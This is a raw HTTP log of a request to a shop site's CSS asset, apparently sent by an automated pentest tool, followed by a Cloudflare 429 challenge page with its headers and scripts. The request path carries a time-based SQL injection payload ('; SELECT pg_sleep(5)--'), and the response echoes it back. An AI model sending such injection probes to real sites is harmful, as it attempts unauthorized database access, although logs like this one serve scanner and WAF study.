REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/1%3B%20SELECT%20pg_sleep%285%29--/assets/component-price.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9501
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84780fa59a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=aJl8dGt2xuwGxDE9h0euT08vD19x4J4qSDyTLH%2BCg2MdD2SB9bpqTHwNFYUe7jgvpepSdn3XO04lrkmqeROeZbBwqlAKDX7qIYXk8fBgNNLWWB9AE%2FL9vaR%2F%2B%2BS9lUcBdfyFNwcFmpdkfgMK4A%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84780fa59a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'sC9wqvXDW6FMvpTEH48E_a.2FPsvVi0vJslS.Wfki4k-1784281164-1.2.1.1-85Jo7mEiOpHaGKIYqQ0K8Fph0eo11lohcF0uh2py400YjABvbfjbCPK2fnr0vG55',cITimeS: '1784281164',cRay: 'a1c84780fa59a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/1;%20SELECT%20pg_sleep(5)--/assets/component-price.css?__cf_chl_tk=.EQrqGqfZ1qVneJKXIfHlfeafR6Exku.vjdcmLO6QEc-1784281164-1.0.1.1-W0tGpxCDekCFRfpGEXKKRIWrAbrm1qu5vHl9mn452hg",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/1;%20SELECT%20pg_sleep(5)--/assets/component-price.css?__cf_chl_f_tk=.EQrqGqfZ1qVneJKXIfHlfeafR6Exku.vjdcmLO6QEc-1784281164-1.0.1.1-W0tGpxCDekCFRfpGEXKKRIWrAbrm1qu5vHl9mn452hg",md: '1OiUfyw.JvGOMnzNFUH9g66dBhUQ.g5liDTnG0CA7vA-1784281164-1.2.1.1-WZrrVRCTPhpV7MuXXdOdfO531JI7uzKQKh6v88hjvvl8Ovy2rfpwugdkfCNxMHIpL.97AYc4nz.Ordxuknu.aKAxoUiyhpyO9IEGbMI2sUuNbao3fQBG5MbAngj_0OIg50VSVWuDanPS0sOTjYircEC_VQIKkZNDjN6r6JO5VopRwSyK57olf3VG7bfp7uU7RWUFEmPXRjg1pHX6pKtHqG_T68373MlI3KdOLi_K3e2e0UO6KlM8c.3qBaBBr_43Z.7Xm2sUMXB37WypUJRRXV9s05Qx_ABdxw_E8LEguc1xLHR4AbSI9oouYV6jAcYKXJyiH8p15TUiaFz_sL08fxracbs53s4ziZ55wbU50MHnA.JnXb8ph5FV5oFnwkKT6ubPdLF5AtGnphHHxAO5Z5RCfI3hOc30DGLqVISDSH6T_bEkaNwzr3fzh5UUT8GdzfWe3dtQn9AtRi7kjjmMs6XkTHVI8lurB9bGDvp4fCZWOaniSMAf46HtgRUHb.0EPr4NpzIxZM.WhKxmY17C0oOrEiATKNIZrXF4ciwjQcM.wRN7QBTyh6YV4JbKgm28VlCIPdn6X8jPL.ctaxMGkdrnGXIZX2TlVglvvlCs6QHPpDt7RD9nRkdteuoB9qKg8o6MCMnTUmjPNIHisbNyQCtF2fFQ4WinvmlDgTydNs64A4hHHX4KGdo1cgMEM_2Fm7F1fEJLrCaZ_E0mMk_n.68pAes9a.94nH4RAE2au6RqaMt17GTL304rwQU6n61PTnRRjpx6YiW8JfOAxcEjDiDlynNugCngyKz7Td5rFyIua1g28KM3WeRSW5UvJQoNoRqDQozGU69f16pBOH8om1rJwSteppqTvmDttUMAzKBNBAz.hRqPKgxJJefB3bKvbazKDcugKTyNWJff0xqnmyTDrqXVbiZmEXLgWC6SLcSL_B92sTfUiW96AmmkQ3F8Q.zfW3KkpVpJhEIr1GZhnubvec.rsfeR3jBBVv9G6ieLljvxHgxAixILiTZAvwvVpv0dc2ALAT0ovNvLMWk93E3ELWr2BHgalrz.dGilT84XtvpQMXbr7a5Ul0xWSQowtuJOyyH6rmM47AugCJ5yP.kwKcPICvF14QjGedHjCkrybHzHTUrFi4ncaiLfsKUb3KSz5hCjP76.gP698NV3RGGRnPLynKAz3IRb5nV08HjXKP8n7nIt7rLiF1NZo8PPkX6tbqtzoME_wmwJ6U22iXJGaMX8jlRArfweMFebsl0',mdrd: 'SjWPQYUsODielNy.oDLJvPOPHAHQLoVL0I6ldZzA4EY-1784281164-1.2.1.1-svqCcLrLuLw55nPIikaWF5p9bd42Glr7D..bOioQw0muICUHe72Q.LWu3A8_zIj_88f3rc39vhV6vLfv1qQRG6PXgSfhtrtgGTn1cLr7TTFsIb.KB2Iel0dJILn18MRF4qM8IB1ABlTYERgkq35XneRSfJXise2qdNmMrfL2unjRREe5uo7CYaeUk3G1_TRkA9TmulptoZxACvxUSHP_Ir.WEl6eW0LMkJ5EyZylqpP3cTHVFDgNh0.jI186GRiF',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84780fa59a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/1;%20SELECT%20pg_sleep(5)--/assets/component-price.css?__cf_chl_rt_tk=.EQrqGqfZ1qVneJKXIfHlfeafR6Exku.vjdcmLO6QEc-1784281164-1.0.1.1-W0tGpxCDekCFRfpGEXKKRIWrAbrm1qu5vHl9mn452hg"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
